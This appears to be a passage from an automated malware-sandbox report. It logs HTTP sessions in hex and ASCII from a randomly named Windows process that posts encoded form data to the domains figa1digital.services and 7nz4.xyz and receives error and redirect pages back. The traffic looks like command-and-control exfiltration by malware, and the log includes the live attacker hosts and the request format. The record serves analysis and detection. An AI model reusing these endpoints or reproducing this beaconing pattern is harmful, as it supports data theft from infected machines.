Nov 11, 2024 06:53:05.446204901 CET	636	IN	Data Raw: 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c Data Ascii: </div> </div> </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
Nov 11, 2024 06:53:05.446216106 CET	1236	IN	Data Raw: 64 69 6e 67 2d 31 2e 33 20 6d 62 2d 34 22 3e 57 68 61 74 20 63 61 6e 20 49 20 64 6f 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 35 20 66 6f Data Ascii: ding-1.3 mb-4">What can I do?</h2> <h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold
Nov 11, 2024 06:53:05.446229935 CET	1137	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 68 69 64 Data Ascii: m:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50052	188.114.97.3	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:07.481395006 CET	10904	OUT	POST /zjtq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.figa1digital.services Origin: http://www.figa1digital.services Referer: http://www.figa1digital.services/zjtq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 50 73 47 54 6d 50 30 55 39 36 55 78 49 58 59 62 4e 6b 50 44 75 4f 62 55 59 72 6e 44 38 62 6e 48 59 72 57 76 44 63 79 65 51 74 2f 6c 69 33 75 57 56 48 51 79 7a 32 62 74 41 4d 32 7a 47 54 4c 6f 4f 36 71 42 63 61 4a 68 69 56 70 39 56 4f 4d 62 79 6d 6c 78 68 71 63 37 76 4c 53 50 77 42 4c 4c 48 41 4a 57 44 61 35 75 63 6f 50 4a 49 77 51 69 71 6e 73 55 31 58 4b 36 32 6c 75 6a 54 59 7a 2b 32 50 55 45 62 5a 55 33 52 4b 2b 49 50 31 36 32 48 76 7a 69 70 78 2b 72 37 6d 49 42 2b 54 6b 61 34 76 68 54 74 43 4a 59 61 63 73 62 67 43 6b 38 56 77 79 43 6f 43 34 6d 6c 48 7a 33 62 35 43 47 4f 35 6d 52 72 2f 74 39 6e 63 63 78 4f 33 54 50 73 42 4c 49 45 51 77 41 75 64 6f 6d 75 36 4e 4b 63 46 77 42 66 41 6a 50 43 49 2f 79 65 43 6f 50 4c 51 54 33 44 46 31 64 4f 4b 55 6e 70 2b 7a 77 68 6d 51 34 59 62 58 68 51 78 31 37 64 6b 42 42 51 51 45 5a 6d 36 58 55 79 2f 45 51 6f 73 76 31 50 42 35 42 37 44 2f 36 6d 52 6b 58 35 54 53 35 49 76 73 61 43 79 51 73 55 65 4a 54 4c 33 61 6b 65 37 35 37 64 6e 46 35 72 54 67 5a [TRUNCATED] Data Ascii: fZah6=PsGTmP0U96UxIXYbNkPDuObUYrnD8bnHYrWvDcyeQt/li3uWVHQyz2btAM2zGTLoO6qBcaJhiVp9VOMbymlxhqc7vLSPwBLLHAJWDa5ucoPJIwQiqnsU1XK62lujTYz+2PUEbZU3RK+IP162Hvzipx+r7mIB+Tka4vhTtCJYacsbgCk8VwyCoC4mlHz3b5CGO5mRr/t9nccxO3TPsBLIEQwAudomu6NKcFwBfAjPCI/yeCoPLQT3DF1dOKUnp+zwhmQ4YbXhQx17dkBBQQEZm6XUy/EQosv1PB5B7D/6mRkX5TS5IvsaCyQsUeJTL3ake757dnF5rTgZx05y8zx4PPTcpsZLvSSIC0m/ho8wlFJALUwjDJ7GH5FfAxfGUvtNDQ5bRiIIql6d2nkPcGnI4Z5hUKGWEXoxLoS5Wj1UHx6c4yb5Vn+Pmh3hBwD9j47Dpve/4560W6NwfcxRFBKtH84UC1dLnS58De8NSYhjS6zEYVNZAyZrlVDWeOeXmDFaqp6Fzvz9Qcxanyxr2l/DHQGVYlMnQ7sDNslSDvyPPBR6i0OKS1wacf099wCu3/zzaHVSjB+SxBFMULH8oppVv+BVlrS8lpt90AEztdLXTvIfDaqj0J7blGxrBbVeCF40yf1D9cVA8bMbHkEWfwa/PVEAXGLrgsL6+m/PiQXuM56ne3Uc/RmMNHDuA1k+pmSurtV+isOrVBtDzp9F2MSur096P60v4xoRqYUihPek7e9Ujsfam2TgEBM54gV+5bvk247iln/pm1g6qn1spde3QsXvPhEsVnP2WF4trkpbF9N0vyL4bBA42s1w+Gd+yosbw6kPyTz8walQjbILJmfc7CHguHgLQ97BFZV66NVHGBryEUcJsoGfAf/LfnTx0/Zz8VGmoFFV9GxG2cE/Wv3/p9I4FkZefMAkQM4XYmb37lJdUUWoOrnBYBifrBrcvOE5ExrX2PguAuqzguKMx9OlxmMLNw5xk96XWL7KjZYjVn3jgF [TRUNCATED]
Nov 11, 2024 06:53:07.961374044 CET	1236	IN	HTTP/1.1 520 Date: Mon, 11 Nov 2024 05:53:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 7243 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DGJ4JuBPeapsG%2BkCbl9bY5piPOPenFWyfaqS1Nu%2BqxSV5jjCoqT6jS7aOaT%2BIoHXFW%2BmOcT69ohvwjTV%2ByoBS2tRplM6owPZE0oU2698nX%2BY1%2F%2FAr8unvErs4AMB688TZtb%2BSmNpfiHqJrl9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8e0c05280a71abf4-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11796&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10904&delivery_rate=0&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"
Nov 11, 2024 06:53:07.961389065 CET	1236	IN	Data Raw: 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 20 7c 20 35 32 30 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 Data Ascii: > ...<![endif]--><head><title>www.figa1digital.services \| 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatib
Nov 11, 2024 06:53:07.961405993 CET	1236	IN	Data Raw: 20 20 20 20 20 20 3c 2f 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 79 2d 38 20 62 67 2d 67 72 61 64 69 65 6e 74 2d 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: </header> <div class="my-8 bg-gradient-gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15
Nov 11, 2024 06:53:07.961417913 CET	636	IN	Data Raw: 67 6e 3d 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e Data Ascii: gn=www.figa1digital.services" target="_blank" rel="noopener noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top
Nov 11, 2024 06:53:07.961429119 CET	1236	IN	Data Raw: 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 61 64 69 6e 67 2d 31 2e 33 20 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 65 65 6e 2d 73 75 63 63 65 73 73 22 3e 57 6f 72 6b 69 6e 67 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 Data Ascii: span class="leading-1.3 text-2xl text-green-success">Working</span></div><div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 o
Nov 11, 2024 06:53:07.961440086 CET	1236	IN	Data Raw: 61 6e 64 20 74 68 65 20 6f 72 69 67 69 6e 20 77 65 62 20 73 65 72 76 65 72 2e 20 41 73 20 61 20 72 65 73 75 6c 74 2c 20 74 68 65 20 77 65 62 20 70 61 67 65 20 63 61 6e 20 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 3c 2f 70 3e 0a 20 20 20 Data Ascii: and the origin web server. As a result, the web page can not be displayed.</p> </div> <div class="w-1/2 md:w-full float-left leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4
Nov 11, 2024 06:53:07.961452007 CET	1236	IN	Data Raw: 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f Data Ascii: d border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8e0c05280a71abf4</strong></span> <span class="cf-footer-separator sm:hidden">&bu
Nov 11, 2024 06:53:07.961467981 CET	131	IN	Data Raw: 4c 69 73 74 65 6e 65 72 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 64 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 65 72 72 6f Data Ascii: Listener&&a.addEventListener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50053	188.114.97.3	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:10.024059057 CET	530	OUT	GET /zjtq/?fZah6=Cuuzl5FVgphuAFBESmHRpvP2Veux2vrxQdW4Gde9XtzmimLWUn4Ll1T5MO27eRDtOrOWVppgjVRQMehzsGxVlZovxZP6uR3wLXZLAqFvA+7mOHQos1c683Q=&42T8f=ABwh0lAHdJnXMBd HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.figa1digital.services User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:53:10.526686907 CET	1028	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 05:53:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7q8gpShJf%2B8903yVpcjMwGhxFbeDjmra60%2BB8FM88UHkfDx%2BdO59qhPjITRGv5Jx8bP2rUrd%2FD%2FoR%2BucYkTx6L7QKaVdJe2PkgzVOkOE1V0Vf26wZ77idNK7w7QiU9nM%2FsMNjHmf03p2fDWR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0c0537fd881971-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 5a 61 68 36 3d 43 75 75 7a 6c 35 46 56 67 70 68 75 41 46 42 45 53 6d 48 52 70 76 50 32 56 65 75 78 32 76 72 78 51 64 57 34 47 64 65 39 58 74 7a 6d 69 6d 4c 57 55 6e 34 4c 6c 31 54 35 4d 4f 32 37 65 52 44 74 4f 72 4f 57 56 70 70 67 6a 56 52 51 4d 65 68 7a 73 47 78 56 6c 5a 6f 76 78 5a 50 36 75 52 33 77 4c 58 5a 4c 41 71 46 76 41 2b 37 6d 4f 48 51 6f 73 31 63 36 38 33 51 3d 26 34 32 54 38 66 3d 41 42 77 68 30 6c 41 48 64 4a 6e 58 4d 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 107<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fZah6=Cuuzl5FVgphuAFBESmHRpvP2Veux2vrxQdW4Gde9XtzmimLWUn4Ll1T5MO27eRDtOrOWVppgjVRQMehzsGxVlZovxZP6uR3wLXZLAqFvA+7mOHQos1c683Q=&42T8f=ABwh0lAHdJnXMBd"}</script></head></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50054	38.55.215.72	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:15.606410027 CET	763	OUT	POST /fmne/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.7nz4.xyz Origin: http://www.7nz4.xyz Referer: http://www.7nz4.xyz/fmne/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 48 52 56 67 52 2b 7a 45 2f 75 51 54 45 46 4e 37 36 4f 53 69 62 55 42 33 61 42 57 53 7a 76 6b 73 4e 35 49 76 6a 53 46 35 72 36 47 33 78 6c 67 53 41 38 5a 4d 57 62 36 73 58 74 30 71 39 74 55 7a 64 48 66 64 62 75 76 67 4b 59 41 44 74 73 73 52 58 77 35 43 32 35 43 4d 4b 50 52 6b 66 4a 2b 46 45 32 6d 2f 33 49 34 77 4d 75 75 6e 41 74 37 2f 6e 6f 48 52 4d 30 63 6a 52 6e 44 45 50 30 43 72 79 75 38 44 35 43 37 7a 36 50 6b 67 5a 37 30 56 4d 53 77 5a 58 65 6f 6a 4c 2f 55 75 46 77 71 7a 7a 4c 64 4c 33 4b 67 65 6f 31 43 76 65 6f 74 32 62 62 75 34 75 2b 37 64 35 69 66 6b 71 73 4c 59 50 77 3d 3d Data Ascii: fZah6=HRVgR+zE/uQTEFN76OSibUB3aBWSzvksN5IvjSF5r6G3xlgSA8ZMWb6sXt0q9tUzdHfdbuvgKYADtssRXw5C25CMKPRkfJ+FE2m/3I4wMuunAt7/noHRM0cjRnDEP0Cryu8D5C7z6PkgZ70VMSwZXeojL/UuFwqzzLdL3Kgeo1Cveot2bbu4u+7d5ifkqsLYPw==
Nov 11, 2024 06:53:16.403508902 CET	707	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:16 GMT Content-Type: text/html Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50055	38.55.215.72	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:18.151802063 CET	783	OUT	POST /fmne/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.7nz4.xyz Origin: http://www.7nz4.xyz Referer: http://www.7nz4.xyz/fmne/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 48 52 56 67 52 2b 7a 45 2f 75 51 54 45 6b 39 37 70 35 6d 69 54 55 42 32 55 68 57 53 6b 2f 6b 6f 4e 35 30 76 6a 51 70 70 72 4a 69 33 77 41 6b 53 42 2b 78 4d 58 62 36 73 66 4e 30 7a 67 64 55 6f 64 48 62 76 62 75 6a 67 4b 59 45 44 74 73 63 52 58 48 4e 4e 33 70 43 5a 47 76 52 63 43 5a 2b 46 45 32 6d 2f 33 49 39 74 4d 75 6d 6e 42 65 6a 2f 6f 70 48 57 50 30 63 6b 41 6e 44 45 65 45 43 76 79 75 38 62 35 44 6e 5a 36 4d 63 67 5a 2b 77 56 50 47 73 61 43 75 6f 66 50 2f 56 6a 45 54 44 72 79 72 63 30 35 62 4d 6a 72 57 71 35 62 75 67 73 4b 71 50 76 38 2b 66 75 6b 6c 57 51 6e 76 32 52 55 34 65 41 30 35 45 4c 50 36 41 57 6e 67 68 69 2b 37 34 5a 74 41 55 3d Data Ascii: fZah6=HRVgR+zE/uQTEk97p5miTUB2UhWSk/koN50vjQpprJi3wAkSB+xMXb6sfN0zgdUodHbvbujgKYEDtscRXHNN3pCZGvRcCZ+FE2m/3I9tMumnBej/opHWP0ckAnDEeECvyu8b5DnZ6McgZ+wVPGsaCuofP/VjETDryrc05bMjrWq5bugsKqPv8+fuklWQnv2RU4eA05ELP6AWnghi+74ZtAU=
Nov 11, 2024 06:53:18.941437006 CET	707	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:53:18 GMT Content-Type: text/html Content-Length: 564 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50056	38.55.215.72	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:20.699773073 CET	10865	OUT	POST /fmne/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.7nz4.xyz Origin: http://www.7nz4.xyz Referer: http://www.7nz4.xyz/fmne/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 48 52 56 67 52 2b 7a 45 2f 75 51 54 45 6b 39 37 70 35 6d 69 54 55 42 32 55 68 57 53 6b 2f 6b 6f 4e 35 30 76 6a 51 70 70 72 4a 71 33 78 32 59 53 41 5a 74 4d 55 62 36 73 52 74 30 75 67 64 56 6f 64 44 32 6d 62 75 2f 77 4b 65 59 44 74 50 6b 52 52 79 68 4e 39 70 43 5a 4f 50 52 6e 66 4a 2b 51 45 32 32 37 33 49 74 74 4d 75 6d 6e 42 66 54 2f 73 34 48 57 4a 30 63 6a 52 6e 44 49 50 30 43 44 79 76 55 6c 35 41 4c 6a 36 64 38 67 5a 65 41 56 4e 7a 77 61 65 2b 6f 5a 49 2f 55 77 45 54 66 4b 79 72 52 48 35 62 49 4e 72 56 32 35 61 70 5a 4b 66 5a 33 58 6e 39 6a 44 33 6e 6a 31 68 50 37 49 51 4b 65 58 35 71 52 58 4e 35 41 63 38 68 4e 70 75 2b 67 69 38 57 58 4e 57 78 74 77 6e 6c 67 55 79 4e 4b 38 50 36 56 74 72 4b 61 47 2f 4b 4b 56 71 76 69 6c 46 71 34 75 75 6b 75 59 39 36 79 39 36 7a 76 72 52 6d 72 31 65 39 4a 76 6b 50 44 59 2f 42 77 6f 66 75 4b 57 68 4d 74 6b 6e 34 55 59 64 67 59 78 35 4a 50 42 53 31 66 78 53 59 45 73 51 32 6e 68 34 53 31 71 49 51 6a 4b 48 66 34 67 57 4d 62 46 71 66 52 62 76 52 58 50 [TRUNCATED] Data Ascii: 